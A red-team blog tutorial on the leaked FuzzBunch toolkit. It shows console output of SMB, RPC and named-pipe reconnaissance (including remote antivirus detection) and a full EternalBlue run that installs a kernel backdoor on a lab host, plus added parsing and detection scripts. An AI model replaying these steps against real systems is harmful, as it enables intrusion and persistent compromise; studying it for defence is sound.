
Match Made In The Shadows: Part [2]

Intro

At this point in the series, I assume you have set up a full environment from the Part [1] post here. Today we will cover using FuzzBunch (FB) for exploitation, the tradecraft considerations that went into its design, and what those say about the prowess of this actor. As a Red Teamer, I often find that skill lies in the operator and their knowledge of the toolkit rather than in the capability of the tool. This actor refers to that role as a Tool Champion[1] in a few cases.

In this series we are going to cover the following:

  • Environment setup and configuration
  • Walk through an exploit scenario and tutorial
  • Cover tradecraft and the advanced nature of the DanderSpritz agent
  • Additional deep dive into components

This post will only cover portion two (2) as the material and setup are dense.

FuzzBunch Touches

Before even considering exploitation, any good operator would run some level of checks first, and one of the exciting toolsets packaged inside FB for this is "Touches". Touch is a suite of tools that lets an operator interrogate targets effectively, pull back data, and fingerprint a host. It fills the same role as the scanning and enumeration functionality you may have used inside Metasploit in the past.

SmbTouch (ST)

When dealing with SMB, all cards are on the table for exploitation, as it is one of the top targets in a Windows environment. In environments with trusted resources within a domain, you're going to see port 445 open. ST was built exactly for this scenario.

This tool allows an operator to check the target's OS and pipes, and whether the target is vulnerable to any of the exploits within FB. One thing to note: if you have ever had to deal with SMB packet analysis you may be familiar with anonymous sessions. By default, ST uses an anonymous session to enumerate the host; if credentials that have access to the target are provided, it will be able to authenticate to the host's named pipes. This technique is valid for any host from Windows 7 onward, since XP was the last version that supported anonymous access to named pipes. Below is example output from my lab machine:


[!] Entering Plugin Context :: Smbtouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136

fb Touch (Smbtouch) > execute

[!] Preparing to Execute Smbtouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels

[+] Configure Plugin Remote Tunnels


Module: Smbtouch
================

Name                    Value
----                    -----
NetworkTimeout          60
TargetIp                192.168.251.136
TargetPort              445
RedirectedTargetIp
RedirectedTargetPort
UsingNbt                False
Pipe
Share
Protocol                SMB
Credentials             Anonymous

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] SMB Touch started

[*] TargetIp              192.168.251.136
[*] TargetPort            445
[*] RedirectedTargetIp    (null)
[*] RedirectedTargetPort  0
[*] NetworkTimeout        60
[*] Protocol              SMB
[*] Credentials           Anonymous

[*] Connecting to target...
        [+] Initiated SMB connection

[+] Target OS Version 6.1 build 7601
    Windows 7 Enterprise 7601 Service Pack 1

[*] Trying pipes...
        [-] spoolss    - Not accessible (0xC0000022 - NtErrorAccessDenied)
        [-] browser    - Not accessible (0xC0000022 - NtErrorAccessDenied)
        [-] lsarpc     - Not accessible (0xC0000022 - NtErrorAccessDenied)
[-] No pipes accessible

[Not Supported]
        ETERNALSYNERGY  - Target OS version not supported

[Not Vulnerable]
        ETERNALROMANCE  - Named pipe required for exploit
        ETERNALCHAMPION - Not a browser for unauth, pipe/share required

[Vulnerable]
        ETERNALBLUE     - DANE

[*] Writing output parameters

[+] Target is vulnerable to 1 exploit
[+] Touch completed successfully

[+] Smbtouch Succeeded

Rpctouch

This module appears to be a meta-module of Smbtouch, allowing an operator to set flags to target architecture, language, and versioning. The architecture check will not work unless you have access to the "Browser" pipe, of course.

fb > use Rpctouch

[!] Entering Plugin Context :: Rpctouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136

fb Touch (Rpctouch) > execute

[!] Preparing to Execute Rpctouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.136:445

[+] Configure Plugin Remote Tunnels


Module: Rpctouch
================

Name                 Value
----                 -----
NetworkTimeout       60
TargetIp             192.168.251.136
TargetPort           445
NetBIOSName          *SMBSERVER
TouchLanguage        False
TouchArchitecture    False
Protocol             SMB

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] SMB String: Windows 7 Enterprise 7601 Service Pack 1 (WIN7SP1)
[+] Rpctouch Succeeded

ArchTouch (AT)

As shown above, RT enumerates the version; one thing to note is that using this method you will not be able to enumerate the architecture, since you will not have access to the "Browser" pipe[2]. It seems that when connecting to a DCE-RPC endpoint on port 49152, AT sends a crafted packet to BIND to the service. When this takes place, a few transactional structures are passed to optimize performance between the two endpoints, such as the version and CTX items. This prompts a response from the RPC mapper indicating acceptance or rejection of each CTX item. Due to the nature of this tool, I was inherently curious about how it worked, as I didn't know this was possible on a Windows 7 machine.

DCE/RPC Bind call (Req)

When AT sends its first packet, it completes a TCP handshake and sends an RPC Bind request. Packaged in this request are two (2) items of interest: a 32-bit Network Data Representation (NDR) transfer syntax and a 64-bit NDR transfer syntax.

The NDR wire protocol, also referred to as transfer syntax, enables RPC calls to traverse the network. The wire protocol defines the wire representation of an RPC call, such as the order in which data members are marshaled, alignment of data on the wire, additional information included with the data, and other issues.[3]

Below is a hex+ASCII dump and the tree dump from Wireshark, if interested:

0000   05 00 0b 03 10 00 00 00 74 00 00 00 00 00 00 00  ........t.......
0010   d0 16 d0 16 00 00 00 00 02 00 00 00 00 00 01 00  ................
0020   80 bd a8 af 8a 7d c9 11 be f4 08 00 2b 10 29 89  .....}......+.).
0030   01 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00  .....]..........
0040   2b 10 48 60 02 00 00 00 01 00 01 00 80 bd a8 af  +.H`............
0050   8a 7d c9 11 be f4 08 00 2b 10 29 89 01 00 00 00  .}......+.).....
0060   33 05 71 71 ba be 37 49 83 19 b5 db ef 9c cc 36  3.qq..7I.......6
0070   01 00 00 00                                      ....

Distributed Computing Environment / Remote Procedure Call (DCE/RPC) Bind, Fragment: Single, FragLen: 116, Call: 0
    Version: 5
    Version (minor): 0
    Packet type: Bind (11)
    Packet Flags: 0x03
    Data Representation: 10000000 (Order: Little-endian, Char: ASCII, Float: IEEE)
    Frag Length: 116
    Auth Length: 0
    Call ID: 0
    Max Xmit Frag: 5840
    Max Recv Frag: 5840
    Assoc Group: 0x00000000
    Num Ctx Items: 2
    Ctx Item[1]: Context ID:0, MGMT, 32bit NDR
        Context ID: 0
        Num Trans Items: 1
        Abstract Syntax: MGMT V1.0
        Transfer Syntax[1]: 32bit NDR V2
            Transfer Syntax: 32bit NDR UUID:8a885d04-1ceb-11c9-9fe8-08002b104860
            ver: 2
    Ctx Item[2]: Context ID:1, MGMT, 64bit NDR
        Context ID: 1
        Num Trans Items: 1
        Abstract Syntax: MGMT V1.0
        Transfer Syntax[1]: 64bit NDR V1
            Transfer Syntax: 64bit NDR UUID:71710533-beba-4937-8319-b5dbef9ccc36
            ver: 1

DCE/RPC Bind call (Rep)

If the endpoint replies, it sends back the proper NDR to serialize with for optimal performance (from the research I have seen). In this packet are two (2) CTX items.

The first is a rejection of one platform:

0000   02 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0010   00 00 00 00 00 00 00 00                          ........

Ctx Item[1]: Provider rejection, PNIO (Implicit Ar)
    Ack result: Provider rejection (2)
    Ack reason: Proposed transfer syntaxes not supported (2)
    Transfer Syntax: PNIO (Implicit Ar)
    Syntax ver: 0

The second is the acceptance of the supported provider, denoting the endpoint's target architecture. A nifty method I didn't know about; maybe I'm just behind the times, haha!

0000   00 00 00 00 33 05 71 71 ba be 37 49 83 19 b5 DB  ....3.qq..7I....
0010   ef 9c cc 36 01 00 00 00                          ...6....

Ctx Item[2]: Acceptance, 64bit NDR
    Ack result: Acceptance (0)
    Transfer Syntax: 64bit NDR
    Syntax ver: 1
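To make the two captures above concrete, here is a small decoder, added to this write-up as an example (it is not code from the post or from the FuzzBunch tooling), that parses the Bind request from the hex dump and the two result items from the Bind_ack, then applies the rule the Architouch output implies: an accepted 64-bit NDR context means a 64-bit endpoint. The byte strings are transcribed from the dumps above; the NDR32, NDR64 and MGMT UUIDs are the ones Wireshark names in the decode. Note that the rejected item carries an all-zero transfer-syntax UUID (the nil UUID), which Wireshark happens to label "PNIO (Implicit Ar)". The is_arch_fingerprint_bind helper is an assumed detection heuristic, not part of any tool.

```python
import struct
import uuid

# Well-known DCE/RPC syntax UUIDs, as named in the Wireshark decode above.
NDR32 = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")
NDR64 = uuid.UUID("71710533-beba-4937-8319-b5dbef9ccc36")
MGMT = uuid.UUID("afa8bd80-7d8a-11c9-bef4-08002b102989")
NIL = uuid.UUID(int=0)
NAMES = {NDR32: "32bit NDR", NDR64: "64bit NDR", MGMT: "MGMT", NIL: "nil UUID"}

PTYPE_BIND = 11
ACK_RESULTS = {0: "Acceptance", 1: "User rejection", 2: "Provider rejection"}
ACK_REASONS = {0: "Reason not specified", 1: "Abstract syntax not supported",
               2: "Proposed transfer syntaxes not supported", 3: "Local limit exceeded"}

# The 116-byte Bind request, transcribed from the hex dump in the post.
BIND_REQUEST = bytes.fromhex(
    "05 00 0b 03 10 00 00 00 74 00 00 00 00 00 00 00"
    "d0 16 d0 16 00 00 00 00 02 00 00 00 00 00 01 00"
    "80 bd a8 af 8a 7d c9 11 be f4 08 00 2b 10 29 89"
    "01 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00"
    "2b 10 48 60 02 00 00 00 01 00 01 00 80 bd a8 af"
    "8a 7d c9 11 be f4 08 00 2b 10 29 89 01 00 00 00"
    "33 05 71 71 ba be 37 49 83 19 b5 db ef 9c cc 36"
    "01 00 00 00"
)
# The two p_result_t items from the Bind_ack, transcribed from the two 24-byte
# dumps in the post and concatenated (constructed input for this example).
BIND_ACK_RESULTS = bytes.fromhex(
    "02 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00"
    "00 00 00 00 00 00 00 00"
    "00 00 00 00 33 05 71 71 ba be 37 49 83 19 b5 db"
    "ef 9c cc 36 01 00 00 00"
)


def _syntax(buf, off):
    """Decode a p_syntax_id_t: 16-byte UUID in Microsoft byte order + 2+2 version."""
    u = uuid.UUID(bytes_le=bytes(buf[off:off + 16]))
    major, minor = struct.unpack_from("<HH", buf, off + 16)
    return {"uuid": u, "name": NAMES.get(u, str(u)), "version": f"{major}.{minor}"}


def parse_bind(pdu):
    """Parse a DCE/RPC v5 Bind PDU: 16-byte common header, bind fields, context list."""
    ver, minor, ptype, flags, drep, frag_len, auth_len, call_id = struct.unpack_from("<BBBB4sHHI", pdu, 0)
    if ver != 5 or ptype != PTYPE_BIND:
        raise ValueError("not a DCE/RPC v5 Bind PDU")
    if frag_len != len(pdu):
        raise ValueError(f"frag_len {frag_len} does not match buffer length {len(pdu)}")
    max_xmit, max_recv, assoc, n_ctx = struct.unpack_from("<HHIB", pdu, 16)
    off = 28  # header (16) + max_xmit/max_recv (4) + assoc_group (4) + n_ctx + 3 reserved bytes
    ctx_items = []
    for _ in range(n_ctx):
        ctx_id, n_trans = struct.unpack_from("<HB", pdu, off)
        off += 4                      # ctx_id (2) + n_transfer_syn (1) + reserved (1)
        abstract = _syntax(pdu, off)
        off += 20
        transfers = []
        for _ in range(n_trans):
            transfers.append(_syntax(pdu, off))
            off += 20
        ctx_items.append({"ctx_id": ctx_id, "abstract": abstract, "transfer": transfers})
    return {"call_id": call_id, "flags": flags, "max_xmit_frag": max_xmit,
            "max_recv_frag": max_recv, "assoc_group": assoc, "ctx_items": ctx_items}


def parse_bind_ack_results(buf):
    """Decode the p_result_t list of a Bind_ack: one 24-byte entry per proposed context."""
    if len(buf) % 24:
        raise ValueError("result list is not a multiple of 24 bytes")
    results = []
    for off in range(0, len(buf), 24):
        result, reason = struct.unpack_from("<HH", buf, off)
        results.append({"result": ACK_RESULTS.get(result, f"unknown ({result})"),
                        "reason": ACK_REASONS.get(reason, f"unknown ({reason})"),
                        "transfer": _syntax(buf, off + 4)})
    return results


def infer_architecture(results):
    """The post's rule: accepted NDR64 -> 64-bit endpoint, accepted NDR32 only -> 32-bit."""
    accepted = {r["transfer"]["uuid"] for r in results if r["result"] == "Acceptance"}
    if NDR64 in accepted:
        return "x64"
    if NDR32 in accepted:
        return "x86"
    return None


def is_arch_fingerprint_bind(bind):
    """Assumed heuristic: a Bind proposing both NDR32 and NDR64 to the MGMT interface,
    which is what the capture above looks like on the wire."""
    proposed = {t["uuid"] for c in bind["ctx_items"] if c["abstract"]["uuid"] == MGMT
                for t in c["transfer"]}
    return {NDR32, NDR64} <= proposed


if __name__ == "__main__":
    bind = parse_bind(BIND_REQUEST)
    for c in bind["ctx_items"]:
        print(f"ctx {c['ctx_id']}: {c['abstract']['name']} v{c['abstract']['version']} via",
              ", ".join(f"{t['name']} v{t['version']}" for t in c["transfer"]))
    results = parse_bind_ack_results(BIND_ACK_RESULTS)
    for r in results:
        print(f"{r['result']} ({r['reason']}): {r['transfer']['name']}")
    print("Inferred architecture:", infer_architecture(results))
```

Run it against the bytes pulled from a pcap of the port 49152 exchange. As a detection signal the heuristic is weak on its own: 64-bit Windows RPC clients routinely propose NDR64 alongside NDR32, so a bind to the MGMT interface proposing both is worth alerting on only in combination with the source (an unexpected host) and the absence of any follow-up RPC call, which is what a fingerprint-only probe looks like.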

NOTE: After some research, it seems NMAP does not have a check for this... hmm.

Finally, using this module proves simple:

fb > use Architouch

[!] Entering Plugin Context :: Architouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136

fb Touch (Architouch) > execute

[!] Preparing to Execute Architouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [49152] :
[+] (TCP) Local 192.168.251.136:49152

[+] Configure Plugin Remote Tunnels


Module: Architouch
==================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          192.168.251.136
TargetPort        49152

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting...success
[*] Binding to RPC...success

[+] Target is x64

[+] Touch completed successfully

[+] Architouch Succeeded

Namedpipetouch

One of the major reasons I took the time to write this blog was not to recap the leak of these tools, but to deep dive into the thought process behind the tool usage. We can always learn from others, and NPT is a great example of this. At first glance this module does not provide much insight into the use case for such a tool:

fb > use Namedpipetouch

[!] Entering Plugin Context :: Namedpipetouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136

fb Touch (Namedpipetouch) > execute

[!] Preparing to Execute Namedpipetouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.136:445

[+] Configure Plugin Remote Tunnels


Module: Namedpipetouch
======================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          192.168.251.136
TargetPort        445
UsingNbt          False
PipeList          ['\PIPE\browser', '\PIPE\lsarpc', '\PIPE\spoolss',
                   '\PIPE\360OnAccessGet', '\PIPE\360OnAccessSet', '
                  \PIPE\aswUpdSv', '\PIPE\afwCallbackPipe2', '\PIPE\
                  afwCallbackPipe2', '\PIPE\aswUpdSv', '\PIPE\_pspus
                  er_780_AVGIDSMONITOR.EXE_9d97da47-8de1-4699-b3da-9
                  eafb262f2a4', '\PIPE\AVG7B14C58C-E30D-11DB-B553-F8
                  ... (plus 47 more lines)
DescList          ['OS Pipe: computer browser', 'OS Pipe: lsass rpc'
                  , 'OS Pipe: print spooler', '360 Safe', '360 Safe'
                  , 'alwil Avast professional 4.8 Avast Internet Sec
                  urity v5.0', 'Avast Internet Security 5.0', 'Avast
                   Internet Security 5.0', 'Avast pro 4.8 or Avast I
                  S v5.0', 'AVG IS 8.5', 'AVG IS 8.5', 'AVG IS 8.5',
                  ... (plus 35 more lines)
Protocol          SMB

PipeList - A hidden gem

Something fascinating I had not thought about (granted, I don't have Eternal* exploits lying around) is the way exploits are most likely deployed. Any exploit developer worth their salt performs some Continuous Integration (CI), and that most likely includes testing against AV. After using this tool in the lab, I hypothesized that an exploit of this stature most likely came with rules or other checks that must be done to ensure they aren't putting it at risk. The dollar value of such a tool has to be extremely high, I would imagine.

Most of the checks turn out to be for AV. That lines up with a workflow that would make sense for deploying EternalBlue:

FB -> Smbtouch -> Rpctouch? -> Namedpipelist checks -> EternalBlue

This type of check is invaluable for a Red Team when enumerating AV software remotely; in many cases this is otherwise just speculation about an unknown and a risk of operating.
Red Team: are you checking for this? It is an amazing check to add to the toolkit!

Below is the final output denoting the specific pipes found (take note of 2010: an observation on the last update to the pipe list they are checking for?):

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Initializing Connection...
[+] Connection established.
[+] Testing 86 pipes

[+] Testing for OS Pipe: computer browser.
[+] Testing for OS Pipe: lsass rpc
        [+] Pipe Found: \PIPE\lsarpc


[+] Testing for OS Pipe: print spooler.
[+] Testing for 360 Safe..
[+] Testing for all Avast professional 4.8 Avast Internet Security v5.0.
[+] Testing for Avast Internet Security 5.0.
[+] Testing for Avast pro 4.8 or Avast IS v5.0.
[+] Testing for AVG IS 8.5.......
[+] Testing for AVG IS 8.5-9.0.
[+] Testing for AVG IS 9.0.646............
[+] Testing for avira antivirus personal edition premium v7.06, avira premium security suite v7.
[+] Testing for avira premium sec suite  v8.......
[+] Testing for Avira premium security suite v8.
[+] Testing for BitDefender 2010 v13.
[+] Testing for BitDefender TotalSec 2010 v13.0.11...
[+] Testing for BitDefender TotalSec 2010 v13.0.11 Bit Defender Total Security 2009...
[+] Testing for FSecure 2010...........................
[+] Testing for McAfee 8.7i..
[+] Testing for Norton Internet Security 2010.
[+] Testing for Norton IS 2008.
[+] Testing for Norton360 v4; Norton IS 2009; Norton IS 2010; Norton 360 v4.
[+] Testing for Norton360 v4.
[+] Testing for Outpost Security Suite Pro 2009 v6.5.
[+] Testing for Panda IS 2010 v15....
[+] Testing for Sophos 9.0.
[+] Testing for TrendMicro IS 2010 v17.50.
[+] Testing for VMWare Host.

[*] Summary: 1 pipes found
        OS Pipe: lsass rpc - \PIPE\lsarpc
[+] Namedpipetouch Succeeded
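From the defender's side, a sweep like the one above is visible if Detailed File Share auditing is enabled: each named-pipe open under IPC$ produces a Security event 5145 carrying the client address, the account (ANONYMOUS LOGON for an anonymous session) and the pipe name in RelativeTargetName. The check below is an added example, not code from the post: it runs over a constructed batch of such events (a handful of pipe names taken from the PipeList above plus two benign accesses) and flags any source that touches many distinct IPC$ pipes within a short window.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Pipe names taken from the Namedpipetouch PipeList above, used only to build
# the constructed sample events below.
PROBED_PIPES = ["browser", "lsarpc", "spoolss", "360OnAccessGet",
                "360OnAccessSet", "aswUpdSv", "afwCallbackPipe2"]

BASE = datetime(2017, 4, 20, 10, 0, 0)  # constructed timestamp base


def _ev(seconds, ip, user, target, share=r"\\*\IPC$"):
    """One Security 5145 event reduced to the fields the check needs (constructed)."""
    return {"EventID": 5145, "TimeCreated": BASE + timedelta(seconds=seconds),
            "IpAddress": ip, "SubjectUserName": user,
            "ShareName": share, "RelativeTargetName": target}


SAMPLE_EVENTS = (
    # an anonymous session from one host probing pipe after pipe within seconds
    [_ev(i, "10.0.0.5", "ANONYMOUS LOGON", p) for i, p in enumerate(PROBED_PIPES)]
    # a workstation user opening the server service pipe once (benign)
    + [_ev(3, "10.0.0.9", "jdoe", "srvsvc")]
    # the same user reading a file share, which is not IPC$ at all
    + [_ev(5, "10.0.0.9", "jdoe", r"reports\q1.xlsx", share=r"\\*\Data")]
)


def find_pipe_sweeps(events, window=timedelta(seconds=60), min_pipes=5):
    """Return one alert per source IP that opened at least min_pipes distinct
    IPC$ pipes inside any sliding window of the given length."""
    by_src = defaultdict(list)
    for e in events:
        if e["EventID"] == 5145 and e["ShareName"].upper().endswith("IPC$"):
            by_src[e["IpAddress"]].append(e)

    alerts = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        start = 0
        for end in range(len(evs)):
            # shrink the window from the left until it spans at most `window`
            while evs[end]["TimeCreated"] - evs[start]["TimeCreated"] > window:
                start += 1
            span = evs[start:end + 1]
            pipes = {e["RelativeTargetName"].lower() for e in span}
            if len(pipes) >= min_pipes:
                alerts.append({
                    "source": src,
                    "anonymous": any(e["SubjectUserName"].upper() == "ANONYMOUS LOGON" for e in span),
                    "distinct_pipes": len(pipes),
                    "pipes": sorted(pipes),
                    "first_seen": span[0]["TimeCreated"],
                    "last_seen": span[-1]["TimeCreated"],
                })
                break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for a in find_pipe_sweeps(SAMPLE_EVENTS):
        print(f"{a['source']} anonymous={a['anonymous']} "
              f"{a['distinct_pipes']} pipes in {a['last_seen'] - a['first_seen']}: {a['pipes']}")
```

Feed it the 5145 events from your SIEM with the same field names. The threshold and window need tuning per environment, and authorised vulnerability scanners and management agents will trip it too, so allowlist those sources rather than raising the threshold. An anonymous session is the stronger signal, and because 5145 records the access check itself, probes that are denied still show up.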

FuzzBunch Specials

One of the more popular portions of the dump was the mass amount of exploits, many of which are still unpatched on older systems such as XP/2003. While everyone took the time to patch for EB, ESTEEMAUDIT and others are just as viable options on older systems once internal to a network.

To keep this blog focused and on the topic, we will only be using EternalBlue and analyzing the setup, prep, execution of EB.

FuzzBunch Internals

We talked a bit earlier about FB being an exploitation framework, one that resembles Metasploit. Being modular requires the ability to adopt new exploits, code, etc. An XML file also accompanies each exploit and module with its required/optional fields.

Analyzing EternalBlue's fields (XML)

A few things to note: there is the ability to launch via a "DaveProxyPort"; at this point I'm speculating this is some redirector, as I have not had time to look deep into this. Standard options exist:

  • Target IP
  • Target Port
  • Validate Implant
  • Validate Target

<inputparameters>
  <parameter hidden="true" type="TcpPort" name="DaveProxyPort" description="DAVE Core/Proxy Hookup connection port">
    <default>0</default>
  </parameter>
<-----------SNIP---------->
  <parameter xdevmap="ETERNALBLUE_DOUBLEPULSAR_PRESENT" type="Boolean" name="DoublePulsarPresent" description="Set to true if the DOUBLEPULSAR backdoor was already installed and the exploit did not have to be thrown" />
</outputparameters>
<redirection>
  <local protocol="TCP" listenaddr="TargetIp" listenport="TargetPort" closeoncompletion="true" destaddr="//identifier" destport="//service[name='SMB']/port" />

Analyzing EternalBlue's Targets (XML)

The first thing of interest is dating the toolset to the best of my ability. It is already known that this exploit affects nearly all platforms of Windows. But what is interesting is that this exploit manifest only shows support up to Windows 7 and Server 2008 R2! We can gain some insight from this, knowing the authors would of course have added support to this tool when newer operating systems were released. That dates this tool to before Windows 2012, an interesting piece of the puzzle.

<os name="Windows XP" family="windows" architecture="x86 32-bit">
  <bindtovalue name="Target" value="XP" />
</os>
<---------------SNIP-------------->
<os servicepack="1" name="Windows 7" family="windows" architecture="x64 64-bit">
  <bindtovalue name="Target" value="WIN72K8R2" />
</os>
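The manifest drives everything the prompt-driven flow later in the post asks for, so it is worth being able to read one programmatically. Below is an added example (not code from the post or from the FuzzBunch framework) that parses a small manifest modelled on the fragments above with the standard library. The <plugin> root element and the <targets> wrapper are assumed names, the TargetIp/TargetPort/VerifyTarget entries are filled in from the prompt output with assumed type names, and treating a parameter without a <default> as required is my reading of "required/optional fields"; the rest follows the quoted XML.

```python
import xml.etree.ElementTree as ET

# Constructed manifest modelled on the EternalBlue fragments quoted above. It is
# example data, not the file from the leak: <plugin> and <targets> are assumed
# names; the types of TargetIp/TargetPort/VerifyTarget are assumed; everything
# else (parameter/default, outputparameters, redirection/local, os/bindtovalue)
# follows the post.
MANIFEST = """\
<plugin name="Eternalblue">
  <inputparameters>
    <parameter hidden="true" type="TcpPort" name="DaveProxyPort"
               description="DAVE Core/Proxy Hookup connection port">
      <default>0</default>
    </parameter>
    <parameter type="IpAddress" name="TargetIp" description="Target IP Address"/>
    <parameter type="TcpPort" name="TargetPort" description="Target SMB port">
      <default>445</default>
    </parameter>
    <parameter type="Boolean" name="VerifyTarget" description="Validate the target OS before exploiting">
      <default>true</default>
    </parameter>
  </inputparameters>
  <outputparameters>
    <parameter xdevmap="ETERNALBLUE_DOUBLEPULSAR_PRESENT" type="Boolean" name="DoublePulsarPresent"
               description="Set to true if the DOUBLEPULSAR backdoor was already installed and the exploit did not have to be thrown"/>
  </outputparameters>
  <redirection>
    <local protocol="TCP" listenaddr="TargetIp" listenport="TargetPort" closeoncompletion="true"
           destaddr="//identifier" destport="//service[name='SMB']/port"/>
  </redirection>
  <targets>
    <os name="Windows XP" family="windows" architecture="x86 32-bit">
      <bindtovalue name="Target" value="XP"/>
    </os>
    <os servicepack="1" name="Windows 7" family="windows" architecture="x64 64-bit">
      <bindtovalue name="Target" value="WIN72K8R2"/>
    </os>
  </targets>
</plugin>
"""


def input_parameters(manifest):
    """List <inputparameters>/<parameter> entries with their defaults.
    A parameter without a <default> is treated as required (assumption about the format)."""
    out = []
    for p in ET.fromstring(manifest).findall("./inputparameters/parameter"):
        default = p.findtext("default")
        out.append({"name": p.get("name"), "type": p.get("type"),
                    "hidden": p.get("hidden", "false").lower() == "true",
                    "default": default, "required": default is None,
                    "description": p.get("description", "")})
    return out


def output_parameters(manifest):
    """Values the plugin hands back, keyed to the framework via the xdevmap attribute."""
    return [{"name": p.get("name"), "type": p.get("type"), "xdevmap": p.get("xdevmap")}
            for p in ET.fromstring(manifest).findall("./outputparameters/parameter")]


def local_tunnels(manifest):
    """The <redirection>/<local> entries behind the 'Configure Plugin Local Tunnels' prompts."""
    return [dict(t.attrib) for t in ET.fromstring(manifest).findall("./redirection/local")]


def supported_targets(manifest):
    """Every <os> entry with the Target value it binds."""
    rows = []
    for os_ in ET.fromstring(manifest).findall("./targets/os"):
        bind = os_.find("bindtovalue")
        rows.append({"name": os_.get("name"), "servicepack": os_.get("servicepack"),
                     "architecture": os_.get("architecture"),
                     "bind": (bind.get("name"), bind.get("value")) if bind is not None else None})
    return rows


def target_value(manifest, name, servicepack, architecture):
    """Resolve (OS name, service pack, architecture) to the bound Target value, or None
    when the OS is not listed, which is the case for anything newer than Windows 7/2008 R2."""
    for row in supported_targets(manifest):
        if (row["name"], row["servicepack"], row["architecture"]) == (name, servicepack, architecture):
            return row["bind"][1] if row["bind"] else None
    return None


if __name__ == "__main__":
    for p in input_parameters(MANIFEST):
        flag = "hidden" if p["hidden"] else ("required" if p["required"] else f"default={p['default']}")
        print(f"{p['name']:<16}{p['type']:<10}{flag}")
    print("targets:", [(r["name"], r["servicepack"], r["bind"][1]) for r in supported_targets(MANIFEST)])
```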

FuzzBunch Explosion Tutorial

One of the exciting aspects of FB is its clear and concise protection against operator mistakes. It's simple yet powerful in the way it always checks with its user before moving forward, in some cases multiple times. As an example of the prowess of the operators and tools being deployed, it has to be one of the most professional platforms I have ever seen for using exploits and preventing mistakes.

EternalBlue Setup

It's quite easy: all you have to do is use the use command to drop into a module. Then, if you type execute, it will walk you through all of the proper settings.

fb > use Eternalblue

[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136

[*] Applying Session Parameters
[*] Running Exploit Touches


[!] Enter Prompt Mode:: Eternalblue

Module: Eternalblue
===================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              192.168.251.136
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
Target                WIN72K8R2

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] : no
[!] Skipping Prompt

[!] Preparing to Execute Eternalblue

[*]  Mode :: Delivery mechanism

   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1
[+] Run Mode: FB

[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] :
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.136:445

[+] Configure Plugin Remote Tunnels


Module: Eternalblue
===================

Name                  Value
----                  -----
DaveProxyPort         0
NetworkTimeout        60
TargetIp              192.168.251.136
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
ShellcodeBuffer
Target                WIN72K8R2

[?] Execute Plugin? [Yes] :

Eternalblue Throw

Once all settings pass the checks and you work your way through the above, you will be able to send the exploit. At a high level the exploit does the following:

  1. Creates an anonymous SMB session
  2. Runs the correlated "Touch" plugin
  3. Validates that your exploit settings match the returned target
  4. Sends the initial exploit buffer
  5. Creates another anonymous SMB session
  6. Sends the last fragment to exploit
  7. Sends the egg / disconnects
  8. Checks the install of the kernel-level backdoor

[*] Executing Plugin
[*] Connecting to target for exploitation.
    [+] Connection established for exploitation.
[*] Pinging backdoor...
    [+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (41 bytes):
0x00000000  57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70  Windows 7 Enterp
0x00000010  72 69 73 65 20 37 36 30 31 20 53 65 72 76 69 63  rise 7601 Servic
0x00000020  65 20 50 61 63 6b 20 31 00                       e Pack 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
    ................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
    [+] Sending SMBv2 buffers
        .........DONE.
    [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
    DONE.
[*] Receiving response from exploit packet
    [+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
    [+] Backdoor returned code: 10 - Success!
    [+] Ping returned Target architecture: x64 (64-bit)
    [+] Backdoor installed
